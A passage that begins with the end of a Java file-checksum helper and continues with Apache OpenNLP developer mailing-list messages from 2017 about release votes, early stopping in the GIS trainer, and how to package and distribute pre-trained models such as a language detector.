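            while ((read = in.read(buffer)) != -1) {
                digest.update(buffer, 0, read);
            }
        }
        StringBuilder hex = new StringBuilder();
        for (byte b : digest.digest()) {
            hex.append(String.format("%02x", b));
        }
        return hex.toString();
    }

    // True if the file's digest equals the expected value (case and surrounding
    // whitespace of the expected value are ignored).
    static boolean matches(Path file, String algorithm, String expectedHex)
            throws IOException, NoSuchAlgorithmException {
        return hexDigest(file, algorithm).equalsIgnoreCase(expectedHex.trim());
    }
}
```

A test that depends on external data can call such a check first and fail with a clear message when the data on disk is not the version the expected scores were computed for.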


[VOTE] Apache OpenNLP 1.8.2 Release Candidate

2017-09-04 Thread Joern Kottmann
Hi Folks,


I have posted a first release candidate for the Apache OpenNLP 1.8.2
release and it is ready for testing.


The RC 1 distributables can be downloaded from here:
https://repository.apache.org/content/repositories/orgapacheopennlp-1017/org/apache/opennlp/opennlp-distr/1.8.2/


The release was made from the Apache OpenNLP 1.8.2 tag at
https://github.com/apache/opennlp/tree/opennlp-1.8.2


To use it in a maven build set the version for opennlp-tools or
opennlp-uima to 1.8.2 and add the following URL to your settings.xml
file:
https://repository.apache.org/content/repositories/orgapacheopennlp-1017

The release was made using the OpenNLP release process, documented on
the Wiki here:
https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process

The release contains quite a few changes; please refer to the contained
issue list for details.


Please vote on releasing these packages as Apache OpenNLP 1.8.2. The vote is
open for at least the next 72 hours.


Only votes from OpenNLP PMC are binding, but folks are welcome to check the
release candidate and voice their approval or disapproval. The vote passes
if at least three binding +1 votes are cast.


[ ] +1 Release the packages as Apache OpenNLP 1.8.2
[ ] -1 Do not release the packages because...


Thanks!

Jörn

P.S. Here is my +1.


Re: Early stopping NameFinderME

2017-08-29 Thread Joern Kottmann
Go ahead and do the change. Otherwise I can work on it tomorrow.

Jörn

On Tue, Aug 29, 2017 at 4:38 PM, Dan Russ <danrus...@gmail.com> wrote:
> Hi Jörn,
>I don’t see a problem with it.  Make sure the default is set to the 
> current value.  Are you making the fix?  I could get to it later tonight.
> Daniel
>
>> On Aug 29, 2017, at 10:32 AM, Joern Kottmann <kottm...@gmail.com> wrote:
>>
>> Hi Daniel,
>>
>> do you see any issue if we expose LLThreshold and allow the user to
>> change it via training parameters?
>>
>> Jörn
>>
>> On Sat, Aug 26, 2017 at 1:07 AM, Daniel Russ <danrus...@gmail.com> wrote:
>>> Jörn,
>>>
>>>   Currently, GISTrainer has a private static final variable LLThreshold,
>>> which determines whether the change in the log likelihood between two
>>> iterations is too small to continue training.  We could make this a
>>> parameter. I am concerned about using the accuracy to train the model.  If
>>> we use accuracy, the weight space may be flat.
>>>
>>>   Saurabh, you use the term “early stopping”.  In deep learning, early 
>>> stopping is used to prevent overtraining and improve generalization to 
>>> unseen data.  I am not sure early stopping serves the same purpose with GIS 
>>> training.  Does anyone know if early stopping improves generalization for a 
>>> maxent problem?
>>>
>>> Daniel
>>>
>>>> On Aug 24, 2017, at 4:48 AM, Joern Kottmann <kottm...@gmail.com> wrote:
>>>>
>>>> You are the first one who ever asked this question. I think we have this as
>>>> an option already on the gis trainer but it is not exposed all the way
>>>> through.
>>>>
>>>> Please open a jira and I can look at it next week.
>>>>
>>>> Jörn
>>>>
>>>> On Aug 21, 2017 5:11 PM, "Saurabh Jain" <saurabh4768j...@gmail.com> wrote:
>>>>
>>>>> Hi All
>>>>>
>>>>> How can we use early stopping while training/cross-validating custom data
>>>>> with NameFinder? What I want is that, if the change in the likelihood value
>>>>> or accuracy of the model is less than 0.05 between two steps that are 5
>>>>> apart (i.e. comparing the output of step x+5 with that of step x), training
>>>>> should stop. I could not find anything regarding this in the documentation.
>>>>> Can someone please help?
>>>>>
>>>>> --
>>>>> *Thanks & Regards*
>>>>>
>>>>>
>>>>> *Saurabh Jain *
>>>>> *AI Developer*
>>>>>
>>>>> *Active Intelligence  *
>>>>>
>>>>> *"*
>>>>> *To do a thing yesterday was the best time . Second best time is today .” 
>>>>> *
>>>>>
>>>
>


Re: Early stopping NameFinderME

2017-08-29 Thread Joern Kottmann
Hi Daniel,

do you see any issue if we expose LLThreshold and allow the user to
change it via training parameters?

Jörn

On Sat, Aug 26, 2017 at 1:07 AM, Daniel Russ <danrus...@gmail.com> wrote:
> Jörn,
>
>   Currently, GISTrainer has a private static final variable LLThreshold,
> which controls if the change in the log likelihood between two iterations is
> too small.  We could make this a parameter. I am concerned about using the
> accuracy to train the model.  If we use accuracy, the weight space may be 
> flat.
>
>   Saurabh, you use the term “early stopping”.  In deep learning, early
> stopping is used to prevent overtraining and improve generalization to unseen 
> data.  I am not sure early stopping serves the same purpose with GIS 
> training.  Does anyone know if early stopping improves generalization for a 
> maxent problem?
>
> Daniel
>
>> On Aug 24, 2017, at 4:48 AM, Joern Kottmann <kottm...@gmail.com> wrote:
>>
>> You are the first one who ever asked this question. I think we have this as
>> an option already on the gis trainer but it is not exposed all the way
>> through.
>>
>> Please open a jira and I can look at it next week.
>>
>> Jörn
>>
>> On Aug 21, 2017 5:11 PM, "Saurabh Jain" <saurabh4768j...@gmail.com> wrote:
>>
>>> Hi All
>>>
>>> How can we use early stopping while training/cross-validating custom data
>>> with NameFinder? What I want is this: if the change in likelihood value or
>>> accuracy of the model is less than 0.05 between two steps that are 5 apart
>>> (i.e. comparing the output of step x+5 with that of step x), then training
>>> should stop. I could not find anything regarding this in the documentation.
>>> Can someone please help?
>>>
>>> --
>>> *Thanks & Regards*
>>>
>>>
>>> *Saurabh Jain *
>>> *AI Developer*
>>>
>>> *Active Intelligence  *
>>>
>>> *"*
>>> *To do a thing yesterday was the best time . Second best time is today .” *
>>>
>
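
The stopping rule discussed in this thread can be illustrated with a small, self-contained sketch. It is not OpenNLP code and does not touch GISTrainer; the class and method names are hypothetical, and the window of 5 iterations and the 0.05 threshold are simply the values from the original question. It takes the log-likelihood recorded after each iteration and reports the first iteration at which the change over the window drops below the threshold.

```java
/** Illustrative only; not part of OpenNLP. All names here are hypothetical. */
class EarlyStopSketch {

    /**
     * Returns the 1-based iteration at which training would stop, or -1 if the
     * change over the window never drops below the threshold.
     */
    static int stoppingIteration(double[] logLikelihoods, int window, double threshold) {
        for (int i = window; i < logLikelihoods.length; i++) {
            // Compare the value at step x+window with the value at step x.
            double change = Math.abs(logLikelihoods[i] - logLikelihoods[i - window]);
            if (change < threshold) {
                return i + 1; // iterations are counted from 1
            }
        }
        return -1;
    }

    public static void main(String[] args) {
        // Made-up log-likelihood values, one per training iteration.
        double[] ll = {-100.0, -60.0, -40.0, -30.0, -25.0, -24.99, -24.98};
        System.out.println(stoppingIteration(ll, 1, 0.05)); // prints 6
        System.out.println(stoppingIteration(ll, 5, 0.05)); // prints -1
    }
}
```

With a window of 1 this reduces to the per-iteration comparison that the thread describes for LLThreshold; a larger window is less sensitive to a single flat step.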


Re: Early stopping NameFinderME

2017-08-24 Thread Joern Kottmann
You are the first one who ever asked this question. I think we have this as
an option already on the gis trainer but it is not exposed all the way
through.

Please open a jira and I can look at it next week.

Jörn

On Aug 21, 2017 5:11 PM, "Saurabh Jain"  wrote:

> Hi All
>
> How can we use early stopping while training/cross-validating custom data
> with NameFinder? What I want is this: if the change in likelihood value or
> accuracy of the model is less than 0.05 between two steps that are 5 apart
> (i.e. comparing the output of step x+5 with that of step x), then training
> should stop. I could not find anything regarding this in the documentation.
> Can someone please help?
>
> --
> *Thanks & Regards*
>
>
> *Saurabh Jain *
> *AI Developer*
>
> *Active Intelligence  *
>
> *"*
> *To do a thing yesterday was the best time . Second best time is today .” *
>


Re: Problem of POSTaggerCrossValidator

2017-07-20 Thread Joern Kottmann
Hello,

attachments are not allowed on this list. Could you please copy the
error you got and the command you used into a mail?

Jörn

On Thu, Jul 20, 2017 at 6:31 AM, Santipong Thaiprayoon
 wrote:
> To whom it may concern.
>
>
> I used OpenNLP version 1.8.1 to train a part-of-speech tagger for the Thai
> language, but I ran into a problem; I have attached 2 files.
>
>
> When I train the model using POSTaggerCrossValidator with a tag dictionary,
> the program fails with an error. When I then train using POSTaggerTrainer
> with the same command, it succeeds.
>
>
> Please help me to solve this problem.
>
>
> Sincerely yours,
>
> Santipong


Re: Releasing a Language Detection Model

2017-07-11 Thread Joern Kottmann
1) This is already included today by default in the model. It is also
possible to place more data in it, e.g. a file which contains eval results,
a LICENSE and NOTICE file, etc.

2) I would take a "best effort" approach and only publish one model
per task and data set, unless there are really good reasons to publish
multiple. In case of langdetect the perceptron and maxent models
perform almost identically, so there is no need to publish both. Probably
we should pick the perceptron model because it is slightly faster. And if
a user disagrees with us - that is totally fine - they can always train
a model themselves according to their own preferences.

All the knowledge on how to train a model should be accessible via
git, and then it is just a matter of running the right command to
start it.

Jörn

On Tue, Jul 11, 2017 at 3:35 PM, Suneel Marthi <smar...@apache.org> wrote:
> ...one last point before wrapping up this discussion.  Is it possible
> that you could have more than one lang detect model, each trained with
> a different algorithm - like say 'MaxEnt', 'Naive Bayes', 'Perceptron'?
>
> Questions:
>
> 1.   Do we just publish one model trained on a specific algorithm, if so
> the metadata would have the algorithm information ?
>
> 2.  Do we publish multiple models for the same task, each trained on
> different algorithms ?
>
>
>
> On Tue, Jul 11, 2017 at 9:30 AM, Joern Kottmann <kottm...@gmail.com> wrote:
>
>> Hello,
>>
>> right, very good point, I also think that it is very important to load
>> a model in one line from the classpath.
>>
>> I propose we have the following setup:
>> - One jar contains one or multiple model packages (thats the zip container)
>> - A model name itself should be kind of unique  e.g. eng-ud-token.bin
>> - A user loads the model via: new
>> SentenceModel(getClass().getResource("eng-ud-sent.bin")) <- the stream
>> gets then closed properly
>>
>>
>> Lets take away three things from this discussion:
>> 1) Store the data in a place where the community can access it
>> 2) Offer models on our download page similar as it is done today on
>> the SourceForge page
>> 3) Release models packed inside a jar file via maven central
>>
>> Jörn
>>
>>
>>
>>
>>
>>
>>
>> On Tue, Jul 11, 2017 at 3:00 PM, Aliaksandr Autayeu
>> <aliaksa...@autayeu.com> wrote:
>> > To clarify on models and jars.
>> >
>> > Putting model inside jar might not be a good idea. I mean here things like
>> > bla-bla.jar/en-sent.bin. Our models are already zipped, so they are "jars"
>> > already in a sense. We're good. However, current packaging and metadata
>> > might not be very classpath friendly.
>> >
>> > The use case I have in mind is being able to add needed models as
>> > dependencies and load them by writing a line of code. For this case having
>> > all models in a root with the same name might not be very convenient. Same
>> > goes for manifest. The name "manifest.properties" is quite generic and it's
>> > not too far-fetched to see some clashes because some other lib also
>> > manifests something. It might be better to allow for some flexibility and
>> > to adhere to classpath conventions. For example, having manifests in
>> > something like org/apache/opennlp/models/manifest.properties. Or
>> > opennlp/tools/manifest.properties. And perhaps even allowing to reference a
>> > model in the manifest, so the model can be put elsewhere. Just in case
>> > there are several custom models of the same kind for different pipelines in
>> > the same app. For example, processing queries with one pipeline - one set
>> > of models - and processing documents with another pipeline - another set of
>> > models. In this case allowing for different classpaths is needed.
>> >
>> > Perhaps to illustrate my thinking, something like this (which still keeps a
>> > lot of possibilities open):
>> > en-sent.bin/opennlp/tools/sentdetect/manifest.properties (perhaps contains
>> > a line with something like model =
>> > /opennlp/tools/sentdetect/model/sent.model)
>> > en-sent.bin/opennlp/tools/sentdetect/model/sent.model
>> >
>> > This allows including en-sent.bin as dependency. And then doing something
>> > like
>> > SentenceModel sdm = SentenceModel.getDefaultResourceModel(); // if we want
>> > default models in this way. Seems verbose enough to allow for some safety
>> > through explicitness. That's if we

Re: Releasing a Language Detection Model

2017-07-11 Thread Joern Kottmann
Hello,

right, very good point, I also think that it is very important to load
a model in one line from the classpath.

I propose we have the following setup:
- One jar contains one or multiple model packages (that's the zip container)
- A model name itself should be kind of unique  e.g. eng-ud-token.bin
- A user loads the model via: new
SentenceModel(getClass().getResource("eng-ud-sent.bin")) <- the stream
gets then closed properly


Let's take away three things from this discussion:
1) Store the data in a place where the community can access it
2) Offer models on our download page similar as it is done today on
the SourceForge page
3) Release models packed inside a jar file via maven central

Jörn
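
One detail worth spelling out for the classpath proposal above: Class.getResourceAsStream returns null rather than throwing when the resource is missing, so a one-line load can fail late with a NullPointerException. The sketch below is a hypothetical helper (not part of OpenNLP) that fails early instead and closes the stream with try-with-resources. The resource name is the example from this message and only resolves if a jar containing it is on the classpath.

```java
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.InputStream;

/** Illustrative helper; not part of OpenNLP. Names are hypothetical. */
class ClasspathModelSketch {

    /** Opens a classpath resource, failing loudly instead of returning null. */
    static InputStream open(Class<?> anchor, String resourceName) throws FileNotFoundException {
        InputStream in = anchor.getResourceAsStream(resourceName);
        if (in == null) {
            throw new FileNotFoundException("Not on classpath: " + resourceName);
        }
        return in;
    }

    public static void main(String[] args) throws IOException {
        // try-with-resources closes the stream even if model loading fails.
        try (InputStream in = open(ClasspathModelSketch.class, "/eng-ud-sent.bin")) {
            // Assuming opennlp-tools is available, the stream would be handed to
            // a model constructor here, e.g. new SentenceModel(in).
            System.out.println("model stream opened, bytes available: " + in.available());
        } catch (FileNotFoundException e) {
            System.out.println(e.getMessage());
        }
    }
}
```

Run without a model jar on the classpath, the program reports the missing resource instead of crashing further down.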







On Tue, Jul 11, 2017 at 3:00 PM, Aliaksandr Autayeu
<aliaksa...@autayeu.com> wrote:
> To clarify on models and jars.
>
> Putting model inside jar might not be a good idea. I mean here things like
> bla-bla.jar/en-sent.bin. Our models are already zipped, so they are "jars"
> already in a sense. We're good. However, current packaging and metadata
> might not be very classpath friendly.
>
> The use case I have in mind is being able to add needed models as
> dependencies and load them by writing a line of code. For this case having
> all models in a root with the same name might not be very convenient. Same
> goes for manifest. The name "manifest.properties" is quite generic and it's
> not too far-fetched to see some clashes because some other lib also
> manifests something. It might be better to allow for some flexibility and
> to adhere to classpath conventions. For example, having manifests in
> something like org/apache/opennlp/models/manifest.properties. Or
> opennlp/tools/manifest.properties. And perhaps even allowing to reference a
> model in the manifest, so the model can be put elsewhere. Just in case
> there are several custom models of the same kind for different pipelines in
> the same app. For example, processing queries with one pipeline - one set
> of models - and processing documents with another pipeline - another set of
> models. In this case allowing for different classpaths is needed.
>
> Perhaps to illustrate my thinking, something like this (which still keeps a
> lot of possibilities open):
> en-sent.bin/opennlp/tools/sentdetect/manifest.properties (perhaps contains
> a line with something like model =
> /opennlp/tools/sentdetect/model/sent.model)
> en-sent.bin/opennlp/tools/sentdetect/model/sent.model
>
> This allows including en-sent.bin as dependency. And then doing something
> like
> SentenceModel sdm = SentenceModel.getDefaultResourceModel(); // if we want
> default models in this way. Seems verbose enough to allow for some safety
> through explicitness. That's if we want any defaults at all.
> Or something like:
> SentenceModel sdm =
> SentenceModel.getResourceModel("/opennlp/tools/sentdetect/manifest.properties");
> Or
> SentenceModel sdm =
> SentenceModel.getResourceModel("/opennlp/tools/sentdetect/model/sent.model");
> Or more in-line with a current style:
> SentenceModel sdm = new
> SentenceModel("/opennlp/tools/sentdetect/model/sent.model"); // though here
> we commit to interpreting String as classpath reference. That's why I'd
> prefer more explicit method names.
> Or leave dealing with resources to the users, leave current code intact and
> provide only packaging and distribution:
> SentenceModel sdm = new
> SentenceModel(this.getClass().getResourceAsStream("/.../.../manifest or
> model"));
>
>
> And to add to model metadata also F1\accuracy (at least CV-based, for
> example 10-fold) for quick reference or quick understanding of what that
> model is capable of. Could be helpful for those with a bunch of models
> around. And for others as well to have a better insight about the model in
> question.
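
The manifest idea quoted above can be sketched with the standard java.util.Properties parser. This is only an illustration of the proposal: the key name "model" and the path are taken from the quoted message, the class and method names are hypothetical, and nothing in this thread says OpenNLP reads such a manifest.

```java
import java.io.IOException;
import java.io.StringReader;
import java.io.UncheckedIOException;
import java.util.Properties;

/** Illustrative only; the manifest layout is the one proposed in the thread. */
class ManifestSketch {

    /** Extracts the classpath location of the model from manifest text. */
    static String modelPath(String manifestText) {
        Properties props = new Properties();
        try {
            props.load(new StringReader(manifestText));
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        String path = props.getProperty("model");
        if (path == null) {
            throw new IllegalArgumentException("manifest has no 'model' entry");
        }
        return path;
    }

    public static void main(String[] args) {
        String manifest = "model = /opennlp/tools/sentdetect/model/sent.model\n";
        // The resolved path could then be passed to Class.getResourceAsStream.
        System.out.println(modelPath(manifest));
    }
}
```

Keeping the indirection in a properties file is what would let two pipelines in the same application point at different models of the same kind.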
>
>
>
> On 11 July 2017 at 06:37, Chris Mattmann <mattm...@apache.org> wrote:
>
>> Hi,
>>
>> FWIW, I’ve seen CLI tools – lots in my day – that can load from the CLI to
>> override an internal classpath dependency. This is for people in environments
>> who want a sensible / delivered internal classpath default and the ability for
>> run-time, non zipped up/messing with JAR file override. Think about people who
>> are using OpenNLP in both Java/Python environments as an example.
>>
>> Cheers,
>> Chris
>>
>>
>>
>>
>> On 7/11/17, 3:25 AM, "Joern Kottmann" <kottm...@gmail.com> wrote:
>>
>> I would not change the CLI to load models from jar files. I never used
>> or saw a command line tool that expects a file as an input and would
>> then also load

Re: Releasing a Language Detection Model

2017-07-11 Thread Joern Kottmann
I would not change the CLI to load models from jar files. I never used
or saw a command line tool that expects a file as an input and would
then also load it from inside a jar file. It will be hard to
communicate how that works precisely in the CLI usage texts and this
is not a feature anyone would expect to be there. The intention of the
CLI is to give users the ability to quickly test OpenNLP before they
integrate it into their software and to train and evaluate models.

Users who for some reason have a jar file with a model inside can just
write "unzip model.jar".

After all I think this is quite a bit of complexity we would need to
add for it and it will have very limited use.

The use case of publishing jar files is to make the models easily
available to people who have a build system with dependency
management, they won't have to download models manually, and when they
update OpenNLP they can also update the models with a version string
change.

For the command line "quick start" use case we should offer the models
on a download page as we do today. This page could list both, the
download link and the maven dependency.

Jörn

On Mon, Jul 10, 2017 at 8:50 PM, William Colen <co...@apache.org> wrote:
> We need to address things such as sharing the evaluation results and how to
> reproduce the training.
>
> There are several possibilities for that, but there are points to consider:
>
> Will we store the model itself in a SCM repository or only the code that
> can build it?
> Will we deploy the models to a Maven Central repository? It is good for
> people using the Java API but not for command line interface, should we
> change the CLI to handle models in the classpath?
> Should we keep a copy of the training model or always download from the
> original provider? We can't guarantee that the corpus will be there
> forever, not only because it changed license, but simply because the
> provider is not keeping the server up anymore.
>
> William
>
>
>
> 2017-07-10 14:52 GMT-03:00 Joern Kottmann <kottm...@gmail.com>:
>
>> Hello all,
>>
>> since Apache OpenNLP 1.8.1 we have a new language detection component
>> which like all our components has to be trained. I think we should
>> release a pre-build model for it trained on the Leipzig corpus. This
>> will allow the majority of our users to get started very quickly with
>> language detection without the need to figure out on how to train it.
>>
>> How should this project release models?
>>
>> Jörn
>>


Re: Releasing a Language Detection Model

2017-07-11 Thread Joern Kottmann
; on which revision of that corpus, which part or subset, language, and
>> whether it had also other annotations (and respective models) for
>> connecting all the possible models from that corpora (e.g.
>> sent-tok-pos-chunk-...).
>>
>> Aliaksandr
>>
>> On 10 July 2017 at 17:41, Jeff Zemerick <jzemer...@apache.org> wrote:
>>
>>> +1 to an opennlp-models jar on Maven Central that contains the models.
>>> +1 to having the models available for download separately (if easily
>>> possible) for users who know what they want.
>>> +1 to having the training data shared somewhere with scripts to generate
>>> the models. It will help protect against losing data as William mentioned.
>>> I don't think we should depend on others to reliably host the data. I'll
>>> volunteer to help script the model generation to run on a fleet of EC2
>>> instances if it helps.
>>>
>>> If the user does not provide a model to use on the CLI, can the CLI tools
>>> look on the classpath for a model whose name fits the needed model (like
>>> en-ner-person.bin) and if found use it automatically?
>>>
>>> Jeff
>>>
>>>
>>>
>>> On Mon, Jul 10, 2017 at 5:06 PM, Chris Mattmann <mattm...@apache.org> wrote:
>>>
>>>> +1. In terms of releasing models, maybe an opennlp-models package, and then
>>>> using Maven structure of src/main/resources//*.bin for
>>>> putting the models.
>>>>
>>>> Then using an assembly descriptor to compile the above into a *-bin.jar?
>>>>
>>>> Cheers,
>>>> Chris
>>>>
>>>>
>>>>
>>>>
>>>> On 7/10/17, 4:09 PM, "Joern Kottmann" <kottm...@gmail.com> wrote:
>>>>
>>>> My opinion about this is that we should offer the model as maven
>>>> dependency for users who just want to use it in their projects, and
>>>> also offer models for download for people to quickly try out OpenNLP.
>>>> If the models can be downloaded, a new user could very quickly test
>>>> it via the command line.
>>>>
>>>> I don't really have any thoughts yet on how we should organize it, it
>>>> would probably be nice to have some place where we can share all the
>>>> training data, and then have the scripts to produce the models checked
>>>> in. It should be easy to retrain all the models in case we do a major
>>>> release.
>>>>
>>>> In case a corpus is vanishing we should drop support for it, must be
>>>> obsolete then.
>>>>
>>>> Jörn
>>>>
>>>> On Mon, Jul 10, 2017 at 8:50 PM, William Colen <co...@apache.org> wrote:
>>>>> We need to address things such as sharing the evaluation results and how to
>>>>> reproduce the training.
>>>>>
>>>>> There are several possibilities for that, but there are points to consider:
>>>>>
>>>>> Will we store the model itself in a SCM repository or only the code that
>>>>> can build it?
>>>>> Will we deploy the models to a Maven Central repository? It is good for
>>>>> people using the Java API but not for command line interface, should we
>>>>> change the CLI to handle models in the classpath?
>>>>> Should we keep a copy of the training model or always download from the
>>>>> original provider? We can't guarantee that the corpus will be there
>>>>> forever, not only because it changed license, but simply because the
>>>>> provider is not keeping the server up anymore.
>>>>>
>>>>> William
>>>>>
>>>>>
>>>>>
>>>>> 2017-07-10 14:52 GMT-03:00 Joern Kottmann <kottm...@gmail.com>:
>>>>>
>>>>>> Hello all,
>>>>>>
>>>>>> since Apache OpenNLP 1.8.1 we have a new language detection component
>>>>>> which like all our components has to be trained. I think we should
>>>>>> release a pre-build model for it trained on the Leipzig corpus. This
>>>>>> will allow the majority of our users to get started very quickly with
>>>>>> language detection without the need to figure out on how to train it.
>>>>>>
>>>>>> How should this project release models?
>>>>>>
>>>>>> Jörn
>>>>>>
>>>>
>>>>
>>>>
>>>>
>>>
>


Re: Releasing a Language Detection Model

2017-07-10 Thread Joern Kottmann
My opinion about this is that we should offer the model as maven
dependency for users who just want to use it in their projects, and
also offer models for download for people to quickly try out OpenNLP.
If the models can be downloaded, a new user could very quickly test
it via the command line.

I don't really have any thoughts yet on how we should organize it, it
would probably be nice to have some place where we can share all the
training data, and then have the scripts to produce the models checked
in. It should be easy to retrain all the models in case we do a major
release.

In case a corpus is vanishing we should drop support for it, must be
obsolete then.

Jörn

On Mon, Jul 10, 2017 at 8:50 PM, William Colen <co...@apache.org> wrote:
> We need to address things such as sharing the evaluation results and how to
> reproduce the training.
>
> There are several possibilities for that, but there are points to consider:
>
> Will we store the model itself in a SCM repository or only the code that
> can build it?
> Will we deploy the models to a Maven Central repository? It is good for
> people using the Java API but not for command line interface, should we
> change the CLI to handle models in the classpath?
> Should we keep a copy of the training model or always download from the
> original provider? We can't guarantee that the corpus will be there
> forever, not only because it changed license, but simply because the
> provider is not keeping the server up anymore.
>
> William
>
>
>
> 2017-07-10 14:52 GMT-03:00 Joern Kottmann <kottm...@gmail.com>:
>
>> Hello all,
>>
>> since Apache OpenNLP 1.8.1 we have a new language detection component
>> which like all our components has to be trained. I think we should
>> release a pre-build model for it trained on the Leipzig corpus. This
>> will allow the majority of our users to get started very quickly with
>> language detection without the need to figure out on how to train it.
>>
>> How should this project release models?
>>
>> Jörn
>>


Releasing a Language Detection Model

2017-07-10 Thread Joern Kottmann
Hello all,

since Apache OpenNLP 1.8.1 we have a new language detection component
which like all our components has to be trained. I think we should
release a pre-build model for it trained on the Leipzig corpus. This
will allow the majority of our users to get started very quickly with
language detection without the need to figure out on how to train it.

How should this project release models?

Jörn


Re: [VOTE] Apache OpenNLP 1.8.1 Release Candidate 3

2017-07-07 Thread Joern Kottmann
+1, I ran the eval tests and they passed

Jörn

On Fri, Jul 7, 2017 at 1:06 PM, Bruno P. Kinoshita
 wrote:
> Build passing OK with the following environment:
> Apache Maven 3.3.9 (bb52d8502b132ec0a5a3f4c09453c07478323dc5; 2015-11-11T05:41:47+13:00)
> Maven home: /opt/maven
> Java version: 1.8.0_131, vendor: Oracle Corporation
> Java home: /usr/lib/jvm/java-8-oracle/jre
> Default locale: en_US, platform encoding: UTF-8
> OS name: "linux", version: "4.4.0-83-generic", arch: "amd64", family: "unix"
>
> Had a look at simple reports (findbugs, pmd), all looking good.
> [ X ] +1 Release the packages as Apache OpenNLP 1.8.1
>
> Thanks
> Bruno
>
> On Thursday, 6 July 2017, 1:21:32 AM NZST, Suneel Marthi wrote:
>
>
> The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP 1.8.1
> Release Candidate 3.
>
> The Release artifacts can be downloaded from:
>
> https://repository.apache.org/content/repositories/orgapacheopennlp-1016/org/apache/opennlp/opennlp-distr/1.8.1/
>
> The release was made from the Apache OpenNLP 1.8.1 tag at
>
> https://github.com/apache/opennlp/tree/opennlp-1.8.1
>
> To use it in a maven build set the version for opennlp-tools or opennlp-uima
> to 1.8.1
>
> and add the following URL to your settings.xml file:
>
> https://repository.apache.org/content/repositories/orgapacheopennlp-1016/
>
> The artifacts have been signed with the Key - D3541808 found at
>
> http://people.apache.org/keys/group/opennlp.asc
>
> Please vote on releasing these packages as Apache OpenNLP 1.8.1. The vote is
>
> open for the next 72 hours *ending on Saturday, July 8AM EST *.
>
> Only votes from OpenNLP PMC are binding, but folks are welcome to check the
>
> release candidate and voice their approval or disapproval. The vote passes
>
> if at least three binding +1 votes are cast.
>
> [ ] +1 Release the packages as Apache OpenNLP 1.8.1
>
> [ ] -1 Do not release the packages because...
>
> Thanks again to all the committers and contributors for their work
> over the past few weeks.


Re: Document Categorizer based on Glove + LSTM (powered by DL4J)

2017-07-05 Thread Joern Kottmann
It would be really great if you could implement doccat format support
for the Stanford Large Movie Review dataset, that way we can also
easily train the normal doccat component with it. We should open a
jira for that.

Jörn

On Wed, Jul 5, 2017 at 7:29 PM, Thamme Gowda <tgow...@gmail.com> wrote:
> Got it, Thanks. We will do it.
>
> On Jul 5, 2017 9:43 AM, "Chris Mattmann" <mattm...@apache.org> wrote:
>
> Thanks Thamme.
>
> Please train on the datasets for sentiment analysis described here so we
> can align with the standard DocCat training I’m doing for sentiment analysis
> post 1.8.1.
>
> http://irds.usc.edu/SentimentAnalysisParser/datasets.html
>
> Thanks!
>
> Cheers,
> Chris
>
>
>
>
> On 7/5/17, 9:34 AM, "Thamme Gowda" <thammego...@apache.org> wrote:
>
> @Tommaso  @Jörn
> Thanks. I will update the PR by making it implement Doccat API.
>
> @Rodrigo
> I have not yet tested on the full Stanford Large Movie Review dataset. It
> takes more time to train, perhaps a few days for multiple passes on the
> entire dataset (on my i5 CPU, no GPUs at the moment).
> I had trained models (multiple times) with 3000 examples (1500 pos, 1500
> neg)  for two epochs, the F1 was approximately 0.70.
> I plan to train on the complete dataset sometime down the line and tune the
> network with more layers (that is the fun part). This PR is like setting up
> the infrastructure for it.
>
> @Chris
> Hi Prof. Thanks for the kind words! Just getting started with my new job
> here - more NLP and Machine Translation stuff to come.
>
> -Thamme
>
> On Wed, Jul 5, 2017 at 8:26 AM, Chris Mattmann <mattm...@apache.org>
> wrote:
>
> > Thamme, great job!
> >
> > (proud academic dad)
> >
> > Cheers,
> > Chris
> >
> >
> >
> >
> > On 7/5/17, 12:31 AM, "Joern Kottmann" <kottm...@gmail.com> wrote:
> >
> > +1 to merge this when it implements the Document Categorizer, then we
> > can also use those tools to train and evaluate it
> >
> > Jörn
> >
> > On Wed, Jul 5, 2017 at 9:28 AM, Rodrigo Agerri <rage...@apache.org> wrote:
> > > Hello again,
> > >
> > > @Thamme, out of curiosity, do you have evaluation numbers on the
> > > Stanford Large Movie Review dataset?
> > >
> > > Best,
> > >
> > > Rodrigo
> > >
> > > On Wed, Jul 5, 2017 at 9:25 AM, Rodrigo Agerri <rage...@apache.org> wrote:
> > >> +1 to Tommaso's comment. This would be very nice to have in the project.
> > >>
> > >> R
> > >>
> > >> On Wed, Jul 5, 2017 at 9:19 AM, Tommaso Teofili
> > >> <tommaso.teof...@gmail.com> wrote:
> > >>> thanks Thamme for bringing this to the list!
> > >>>
> > >>>
> > >>> On Wed, Jul 5, 2017 at 03:49, Thamme Gowda <tgow...@gmail.com> wrote:
> > >>>
> > >>>> Hello OpenNLP Devs,
> > >>>>
> > >>>> I am working with text classification using word embeddings like
> > >>>> GloVe/Word2Vec and LSTM networks.
> > >>>> It will be interesting to see if we can use it as document categorizer,
> > >>>> especially for sentiment analysis in OpenNLP.
> > >>>>
> > >>>> I have already raised a PR to the sandbox repo -
> > >>>> https://github.com/apache/opennlp-sandbox/pull/3
> > >>>>
> > >>>> This is first version, and I expect to receive feedback from Dev community
> > >>>> to make it work for everyone.
> > >>>>
> > >>>> Here are the design choices I have made for the initial version:
> > >>>>
> > >>>>    - Using pre-trained GloVe vectors - I felt the GloVe vector format is clean,
> > >>>>    easily customizable in terms of dimensions and vocabulary size, and

Re: Title: [VOTE] Apache OpenNLP 1.8.1 Release Candidate 2

2017-07-05 Thread Joern Kottmann
Let's cancel this vote. The LanguageDetectorContextGenerator class
should be public, but isn't. This will be fixed for RC 3 which will be
out a little bit later today.

Jörn

On Tue, Jul 4, 2017 at 3:55 PM, Suneel Marthi <smar...@apache.org> wrote:
> +1 binding
>
> 1. Verified hashes and sigs
> 2. clean build from {src} * {tar, zip} and all tests pass
>
>
> On Tue, Jul 4, 2017 at 9:16 AM, Joern Kottmann <kottm...@gmail.com> wrote:
>
>> Hi Folks,
>>
>>
>> I have posted a 2nd release candidate for the Apache OpenNLP 1.8.1
>> release and it is ready for testing.
>>
>>
>> The RC 2 distributables can be downloaded from here:
>> https://repository.apache.org/content/repositories/orgapacheopennlp-1015/org/apache/opennlp/opennlp-distr/1.8.1/
>>
>>
>> The release was made from the Apache OpenNLP 1.8.1 tag at
>> https://github.com/apache/opennlp/tree/opennlp-1.8.1
>>
>>
>> To use it in a maven build set the version for opennlp-tools or
>> opennlp-uima to 1.8.1 and add the following URL to your settings.xml
>> file:
